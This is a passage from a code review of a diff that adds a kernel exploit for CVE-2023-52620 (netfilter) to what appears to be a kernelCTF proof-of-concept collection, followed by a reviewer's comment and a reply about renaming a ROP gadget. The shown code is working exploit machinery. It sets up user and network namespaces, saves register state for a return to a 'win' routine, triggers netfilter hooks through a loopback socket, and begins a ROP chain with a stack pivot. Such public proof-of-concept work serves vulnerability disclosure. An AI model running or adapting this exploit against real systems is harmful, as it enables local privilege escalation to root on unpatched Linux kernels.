pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c

```diff
@@ -0,0 +1,875 @@
+    close(fd);
+}
+
+void new_ns(void) {
+    uid_t uid = getuid();
+    gid_t gid = getgid();
+    char buffer[0x100];
+
+    unshare(CLONE_NEWUSER | CLONE_NEWNS);
+
+    unshare(CLONE_NEWNET);
+
+    write_file("/proc/self/setgroups", "deny");
+
+    snprintf(buffer, sizeof(buffer), "0 %d 1", uid);
+    write_file("/proc/self/uid_map", buffer);
+    snprintf(buffer, sizeof(buffer), "0 %d 1", gid);
+    write_file("/proc/self/gid_map", buffer);
+
+    net_if("lo", -1, IFF_UP);
+}
+
+uint64_t _user_rip = (uint64_t) win;
+uint64_t _user_cs = 0;
+uint64_t _user_rflags = 0;
+uint64_t _user_sp = 0;
+uint64_t _user_ss = 0;
+
+void save_state(void) {
+    __asm__(".intel_syntax noprefix;"
+    "mov _user_cs, cs;"
+    "mov _user_ss, ss;"
+    "mov _user_sp, rsp;"
+    "pushf;"
+    "pop _user_rflags;"
+    ".att_syntax");
+    return;
+}
+
+#define TRIG_HOST "127.0.0.1"
+#define TRIG_PORT 1337
+
+/* Connect to a server in a specific port to trigger netfilter hooks */
+void trig_net_sock(void) {
+    int sockfd = 00;
+    struct sockaddr_in servaddr, cli;
+
+    bzero(&servaddr, sizeof(servaddr));
+    bzero(&cli, sizeof(cli));
+
+    sockfd = socket(AF_INET, SOCK_STREAM, 0);
+    if(sockfd == -1)
+        printf("[-] Socket creation failed");
+
+    servaddr.sin_family = AF_INET;
+    servaddr.sin_addr.s_addr = inet_addr(TRIG_HOST);
+    servaddr.sin_port = htons(TRIG_PORT);
+
+    if(connect(sockfd, (struct sockaddr*) &servaddr, sizeof(servaddr)) != 0)
+        printf("[-] Connection with server failed");
+
+    write(sockfd, "AAAA", 4);
+
+    close(sockfd);
+
+    return;
+}
+
+/* Set up a server to receive hook-triggering output packets */
+void setup_trig_server(void) {
+    int sfd = 0, sock = 0;
+    struct sockaddr_in address;
+    int opt = 1;
+    int addrlen = sizeof(address);
+    char buffer[1024] = { 0 };
+
+    if((sfd = socket(AF_INET, SOCK_STREAM, 0)) == 0)
+        printf("[-] Error at socket()");
+
+    if(setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt)))
+        printf("[-] Error at setsockopt()");
+
+    address.sin_family = AF_INET;
+    address.sin_addr.s_addr = INADDR_ANY;
+    address.sin_port = htons(TRIG_PORT);
+
+    if(bind(sfd, (struct sockaddr*)&address,  sizeof(address)) < 0)
+        printf("[-] Error at bind()");
+
+    if(listen(sfd, 3) < 0)
+        printf("[-] Error at listen()");
+
+    if((sock = accept(sfd, (struct sockaddr*)&address, (socklen_t*)&addrlen)) < 0)
+        printf("[-] Error at accept()");
+
+    read(sock, buffer, 4);
+
+    sleep(3);
+
+    close(sock);
+    close(sfd);
+
+    return;
+}
+
+void trig_sock(){
+    int sfd = 0;
+
+    /* Set up server at TRIG_PORT in a new process */
+    sfd = fork();
+    if(sfd == 0) {
+        setup_trig_server();
+        exit(0);
+    }
+
+    /* Trigger the network hook */
+    trig_net_sock();
+}
+
+void rop_chain_96(uint64_t* data){
+    int i = 0;
+
+    // expr->ops->eval()
+    data[i++] = kbase + PUSH_RBX_POP_RSP;
```

Comment:
Rename `PUSH_RBX_POP_RSP` to `PUSH_RBX_POP_RBP_RSP` as it is important that we are jumping to `rbx+0x08` (== `nft_expr+0x08` == `rop_chain_192+0x18`) here, not to `rbx+0x00`.

Reply:
I renamed `PUSH_RBX_POP_RSP` to `PUSH_RBX_POP_RSP_RBP` because `RSP` is popped first.